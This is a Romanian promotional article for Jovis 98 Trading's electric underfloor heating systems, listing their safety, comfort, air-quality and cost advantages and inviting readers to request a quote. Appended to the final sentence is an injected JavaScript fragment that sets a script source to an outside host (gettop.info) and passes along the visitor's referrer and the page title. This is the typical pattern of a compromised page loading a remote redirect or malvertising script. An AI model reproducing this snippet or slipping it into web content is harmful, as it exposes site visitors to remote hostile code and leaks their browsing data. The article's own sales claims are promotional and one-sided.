774665_521635067856771_1379179749_oVrei sa mai reduce costurile la caldura? Esti o persoana friguroasa si oricat ai incerca nu reusesti sa ai picioarele calde iarna? Sau poate ca vrei sa iti lasi copiii sa se joace pe jos fara a risca sa raceasca? In toate aceste situatii ar trebui sa alegi incalzire sub pardoseala de la Jovis 98 Trading.

Incepand cu 2008 firma Jovis 98 Trading  dezvolta cele mai confortabile si performante sisteme de incalzire electrica in pardoseala destinate uzului casnic, dar si cladirilor de birouri, centrelor si spatiilor comerciale, incaperilor industriale, aleilor si bazelor sportive.

Incalzirea sub pardoseala se poate obtine folosind doua tehnologii diferite, ambele moderne și cu rezultate deosebite in incalzire. Clienții pot opta fie pentru plasele din cabluri calde instalate pe o armatura solida din fibra de sticla sau pentru cabluri in sape. Ambele tehnologii ofera incalzire electrica in pardoseala cu durata de folosinta indelungata si eficienta energetic inalta.

Care sunt avantajele incalzirii sub pardoseala?

Sigur si invizibil

Sistemele de incalzire sub pardoseala Warmup sunt complet sigure, fiind dublu izolate, cu conexiune de protectie si complet invizibile. Sistemele sunt instalate sub pardoseala, castigand spatiul ocupat anterior de radiatoare sau alte echipamente de incalzire.

Confort şi flexibilitate

Caldura produsa este radianta si uniforma pe toata suprafata incalzita, astfel asigurand confortul dorit. Incalzirea sub pardoseala poate fi instalata aproape pe toate tipurile de finisaj.

Inbunatatirea calitatii aerului din imobil

Folosind incalzire sub pardoseala calitatea aerului din interior va fi superioara, aducand beneficii uriase sanatatii. Modalitatea de distributie a energiei termice nu genereaza curenti de aer si nici nu produce circulatia prafului. Sistemele oferite de Jovis 98 Trading sunt complet inodore si silentioase.

Economic si simplu

Sistemele de incalzire sub pardoseala incalzesc orice spatiu rapid si uniform, si te ajuta sa optimizezi costurile la energie. Poti controla cu usurinta temperatura dorita cu ajutorul termostatelor programabile, economisind astfel energie electrica. Sistemele Warmup sunt ultra-subtiri si flexibile, iar din acest motiv instalarea este rapida si usoara.

Incalzire electrica prin pardoseala sau sisteme traditionale?

Sistemele de incalzire traditionale (cu centrale si pompe de caldura) sunt ineficiente din punct de vedere energetic, necesita intretinere costisitoare si ocupa inutil spatiul de multe ori mult pea mic al unui apartament. Datorita termostatului inteligent 3iE, firma poate monta sistemul sub orice tip de pardoseala – parchet din lemn masiv, stratificat sau laminat, piatra naturala, gresie sau ceramica, mocheta, linoleum, etc.

De ce sa alegi la Jovis 98 Trading?

Doresti sa ai incalzire sub pardoseala dar ai vrea sa stii mai intai cam cat te va ajunge proiectul? Nimic mai simplu! Completeaza formularul de pe siteul Jovis 98 Trading si un reprezentant al firmei te va contacta pentru ati prezenta o oferta detaliata pentru proiectul tau.

Daca iti doresti un sistem de incalzire sub pardoseala, apeleaza cu incredere la echipa de profesionisti Jovis 98 Trading si ei te vor ajuta sa faci alegerea corecta in functie de ceea ce iti doresti si de ce ai nevoie.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;